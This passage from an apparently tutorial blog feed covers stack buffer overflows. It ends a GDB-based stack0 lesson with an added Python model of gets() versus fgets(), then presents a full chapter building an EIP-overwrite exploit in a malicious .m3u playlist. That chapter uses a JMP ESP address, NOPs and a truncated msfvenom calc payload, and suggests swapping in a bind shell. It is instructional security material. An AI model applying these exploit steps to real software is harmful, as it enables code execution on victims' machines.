&lt;p&gt;Et voila! We have overwritten the value of the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;modified&lt;/code&gt; variable, and also overwritten the variables after it with our A’s. Let’s do this outside of GDB now:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ./stack0
you have changed the &apos;modified&apos; variable
Segmentation fault
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
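
&lt;p&gt;As an added example (not code from the original post), here is a byte-level model of the stack0 frame that uses the offsets from the disassembly above (buffer at 0x1c(%esp), modified at 0x5c(%esp), ESP = 0xbffffc40 at breakpoint 1). It shows why 64 A’s leave modified untouched while 65 or more change it, puts the bounded fgets(buffer, sizeof buffer, stdin) replacement beside the gets() behaviour, and includes a small helper that diffs two x/32wx dumps (the before and after-28-A’s dumps from above, re-typed here) to locate the first overwritten word. The model frame size, the re-typed dump text and all function names are this example’s own constructions; the offsets and addresses come from the GDB session.&lt;/p&gt;

```python
# Added example: a model of the stack0 frame from the GDB session above.
# Offsets come from the disassembly; frame size and inputs are constructed.

BUF_OFF = 0x1c            # lea 0x1c(%esp),%eax : start of char buffer[64]
BUF_SIZE = 64             # char buffer[64]
MOD_OFF = 0x5c            # movl $0x0,0x5c(%esp) : the 'modified' variable
ESP = 0xBFFFFC40          # ESP at breakpoint 1 ('i r' output above)
FRAME_SIZE = 0x60 + 0x20  # sub $0x60,%esp plus room above it (constructed)


def new_frame():
    """Fresh frame: modified = 0 and every other byte zero (constructed)."""
    return bytearray(FRAME_SIZE)


def read_modified(frame):
    """Reassemble the little-endian word at 0x5c, as x/wx $esp+0x5c does."""
    return int.from_bytes(frame[MOD_OFF:MOD_OFF + 4], "little")


def gets_model(frame, stdin):
    """Model of gets(buffer): copy up to the first newline with no length
    check, then a NUL.  The only bound is the model's own frame, a guard
    the real gets() does not have.  Returns the number of bytes stored."""
    line = stdin.split(b"\n", 1)[0]
    end = min(BUF_OFF + len(line), FRAME_SIZE - 1)
    frame[BUF_OFF:end] = line[:end - BUF_OFF]
    frame[end] = 0
    return end - BUF_OFF


def fgets_model(frame, stdin, n=BUF_SIZE):
    """Model of fgets(buffer, n, stdin): at most n - 1 bytes (newline included
    when it fits) plus a NUL, so the write never leaves the buffer.
    Returns (bytes_stored, truncated); a truncated line should be drained
    or rejected by the caller, never silently accepted."""
    line = stdin.split(b"\n", 1)[0]
    if len(line) != len(stdin):          # a newline was present
        line = line + b"\n"
    kept = line[:n - 1]
    frame[BUF_OFF:BUF_OFF + len(kept)] = kept
    frame[BUF_OFF + len(kept)] = 0
    return len(kept), len(kept) != len(line)


def run_stack0(stdin, reader=gets_model):
    """Run the stack0 logic on constructed input with the chosen reader.
    Returns (modified, message) as the C program would decide them."""
    frame = new_frame()
    reader(frame, stdin)
    modified = read_modified(frame)
    if modified != 0:
        return modified, "you have changed the 'modified' variable"
    return modified, "Try again?"


# The x/32wx dumps from the session above (before input, after 28 A's),
# re-typed as constructed sample input for the diff helper.
DUMP_BEFORE = """
0xbffffc40: 0xbffffc5c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffffc50: 0xb7fd7ff4 0xb7ec6165 0xbffffc68 0xb7eada75
0xbffffc60: 0xb7fd7ff4 0x08049620 0xbffffc78 0x080482e8
0xbffffc70: 0xb7ff1040 0x08049620 0xbffffca8 0x08048469
0xbffffc80: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffffca8
0xbffffc90: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0xbffffca0: 0x08048450 0x00000000 0xbffffd28 0xb7eadc76
0xbffffcb0: 0x00000001 0xbffffd54 0xbffffd5c 0xb7fe1848
"""
DUMP_AFTER_28A = """
0xbffffc40: 0xbffffc5c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffffc50: 0xb7fd7ff4 0xb7ec6165 0xbffffc68 0x41414141
0xbffffc60: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc70: 0x41414141 0x41414141 0xbffffc00 0x08048469
0xbffffc80: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffffca8
0xbffffc90: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0xbffffca0: 0x08048450 0x00000000 0xbffffd28 0xb7eadc76
0xbffffcb0: 0x00000001 0xbffffd54 0xbffffd5c 0xb7fe1848
"""


def parse_x_wx(dump):
    """Turn x/Nwx output into {address: word}; each row is four 4-byte words."""
    words = {}
    for row in dump.strip().splitlines():
        base_text, _, rest = row.partition(":")
        base = int(base_text, 16)
        for i, word in enumerate(rest.split()[:4]):
            words[base + 4 * i] = int(word, 16)
    return words


def changed_words(before, after):
    """Addresses whose contents differ between two dumps, lowest first.
    The first entry is where the input landed; compare it with ESP + BUF_OFF."""
    b, a = parse_x_wx(before), parse_x_wx(after)
    return [addr for addr in sorted(b) if b[addr] != a.get(addr)]
```

The 28-A’s diff also shows the NUL that gets() appends: the word at 0xbffffc78 changes from 0xbffffca8 to 0xbffffc00, which is why even a “harmless” input one byte too long corrupts a neighbouring variable.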

&lt;p&gt;We have completed our first memory corruption exercise! This lays the foundation for stack buffer overflows, so if you’ve made it this far give yourself a good pat on the back! That’s all for now! I’ll see you in the next post!&lt;/p&gt;
</description>
            <pubDate>Sat, 15 Feb 2020 00:00:00 +0000</pubDate>
        </item>
        
        <item>
            <title>Reverse Engineering and Exploit Development Made Easy - Chapter 2</title>
            <link>/exploit/dev/2019/07/08/Reverse-Engineering-and-Exploit-Dev-Chapter-2.html</link>
            <guid isPermaLink="true">/exploit/dev/2019/07/08/Reverse-Engineering-and-Exploit-Dev-Chapter-2.html</guid>
            <description>&lt;h3 id=&quot;reverse-engineering-and-exploit-development-made-easy---chapter-2&quot;&gt;Reverse Engineering and Exploit Development Made Easy - Chapter 2&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;:&lt;/strong&gt;&lt;strong&gt;~&lt;/strong&gt;&lt;strong&gt;# ./chapt2&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Welcome back! In the previous chapter, we focused on the basics of reverse engineering, and gained control of the EIP register using our first binary. Now, let’s dive into the fun stuff: shellcoding!&lt;/p&gt;

&lt;p&gt;So, two things need to be done now:&lt;/p&gt;

&lt;p&gt;1) Place shellcode in ESP (Basically an encoded payload. For example, bind shell or cmd exec.)&lt;/p&gt;

&lt;p&gt;2) Replace EIP with a JMP instruction that points to our shellcode in ESP. A JMP instruction will jump to the shellcode and execute it.&lt;/p&gt;

&lt;p&gt;First, in order to make sure that all of our shellcode is going into ESP, let’s send a recognisable pattern. This way, we will be able to notice if some of our shellcode is getting cut, which can render our exploit unusable. I’ll be using the pattern from the Corelan website itself:&lt;/p&gt;

&lt;div class=&quot;language-python highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;os&lt;/span&gt;
&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;sys&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;open&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;lol.m3u&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;w+&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;junk1&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;A&quot;&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;25000&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1075&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;eip&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;BBBB&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;buf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;buf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;5ABCDEFGHIJK6ABCDEFGHIJK&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;buf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;7ABCDEFGHIJK8ABCDEFGHIJK&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;buf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;9ABCDEFGHIJKAABCDEFGHIJK&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;buf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;BABCDEFGHIJKCABCDEFGHIJK&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;junk2&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;C&quot;&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;30000&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;junk1&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;eip&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;buf&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;string&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;junk1&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;eip&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;buf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;junk2&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;close&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Let’s save the file and put it through the debugger.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/2019-07-08-Reverse-Engineering-and-Exploit-Dev-Chapter-2/image1.png&quot; alt=&quot;image1&quot; /&gt;&lt;/p&gt;

&lt;p&gt;So the highlighted value is what is in ESP. As you can see, our pattern is missing its first 4 bytes (1ABC), which means that the shellcode landing at ESP would be incomplete. This has a simple solution: all we have to do is add 4 bytes of padding before our shellcode. I’ll name this variable preesp.&lt;/p&gt;

&lt;div class=&quot;language-python highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;os&lt;/span&gt;
&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;sys&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;open&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;lol.m3u&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;w+&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;junk1&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;A&quot;&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;25000&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1075&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;eip&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;BBBB&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;preesp&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;XXXX&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;buf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;buf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;5ABCDEFGHIJK6ABCDEFGHIJK&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;buf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;7ABCDEFGHIJK8ABCDEFGHIJK&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;buf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;9ABCDEFGHIJKAABCDEFGHIJK&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;buf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;BABCDEFGHIJKCABCDEFGHIJK&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;junk2&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;C&quot;&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;30000&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;junk1&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;eip&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;preesp&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;buf&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;string&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;junk1&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;eip&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;preesp&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;buf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;junk2&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;close&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Let’s put this through the debugger :)&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/2019-07-08-Reverse-Engineering-and-Exploit-Dev-Chapter-2/image2.png&quot; alt=&quot;image2&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Alright! Our test shellcode is going in just fine. Now, let’s look for a JMP ESP instruction. This instruction should belong to one of the application’s DLLs. Immunity will help us with this hunt :)&lt;/p&gt;

&lt;p&gt;Run the program but do nothing, then right-click anywhere in the CPU window and click Search for &amp;gt; All commands in all modules. Like so:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/2019-07-08-Reverse-Engineering-and-Exploit-Dev-Chapter-2/image3.png&quot; alt=&quot;image3&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Enter jmp esp in the popup box and click find.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/2019-07-08-Reverse-Engineering-and-Exploit-Dev-Chapter-2/image4.png&quot; alt=&quot;image4&quot; /&gt;&lt;/p&gt;

&lt;p&gt;This instruction looks good. Copy the address, and then click on View in the toolbar, and click CPU to go back to the CPU window.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/2019-07-08-Reverse-Engineering-and-Exploit-Dev-Chapter-2/image5.png&quot; alt=&quot;image5&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Now, replace the 4 Bs in your code with this address. But remember one thing: the highlighted address is displayed in big-endian format, while x86 stores a 32-bit value in memory with its least significant byte first. If we write the bytes into our file in the order the debugger shows them, the CPU will not read the address back as 01D2F23A. We need to change it into little-endian, which is the reverse byte order (i.e. 3AF2D201). This is how we will include that address in our code:&lt;/p&gt;

&lt;div class=&quot;language-python highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;n&quot;&gt;eip&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\x3A\xF2\xD2\x01&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Now, let’s generate some shellcode! I’m going to generate shellcode that will open the Calculator application (calc.exe) in Windows XP, just as a test. If this works, we can put a bind shell one in. For this, we will be using Metasploit.&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;msfvenom -a x86 --platform windows -p windows/exec CMD=&quot;calc&quot; --encoder x86/alpha_upper -f py&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;The &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--encoder&lt;/code&gt; flag selects an encoder, in our case x86/alpha_upper. The &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-f py&lt;/code&gt; flag tells it to print the payload in a form we can paste into a Python file. Now, let’s add some NOPs (no-operation instructions, opcode 0x90) in front of it, paste this into our code and watch the magic!&lt;/p&gt;

&lt;p&gt;Your final code should look something like this:&lt;/p&gt;

&lt;div class=&quot;language-python highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;os&lt;/span&gt;
&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;sys&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;open&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;lol.m3u&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;w+&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;junk1&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;A&quot;&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;25000&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1075&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;eip&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\x3A\xF2\xD2\x01&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;preesp&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;XXXX&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;nops&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\x90&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;25&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;buf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;buf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\xd9\xe9\xd9\x74\x24\xf4\xbb\xcb\x65\x09\xdf&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&lt;/span&gt;  &lt;span class=&quot;c1&quot;&gt;# ..... and so on: the remaining buf += lines of the msfvenom output go here&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;buf3&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;C&quot;&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;30000&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;junk1&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;eip&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;preesp&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;nops&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;buf&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;string&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;junk1&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;eip&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;preesp&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;nops&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;buf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;buf3&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;close&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/2019-07-08-Reverse-Engineering-and-Exploit-Dev-Chapter-2/image6.png&quot; alt=&quot;image6&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Congratulations on your first successful exploit! Now, I want you to try and replace the calculator shellcode with a Windows bind shell shellcode and get a shell. In the next chapter, we will cover more ways in which we can execute our shellcode, and look at the other instructions that can replace our JMP ESP.&lt;/p&gt;

</description>
            <pubDate>Mon, 08 Jul 2019 00:00:00 +0000</pubDate>
        </item>
        
        <item>
            <title>Reverse Engineering and Exploit Development Made Easy - Chapter 1</title>
            <link>/exploit/dev/2019/07/01/Reverse-Engineering-and-Exploit-Dev-Chapter-1.html</link>
            <guid isPermaLink="true">/exploit/dev/2019/07/01/Reverse-Engineering-and-Exploit-Dev-Chapter-1.html</guid>
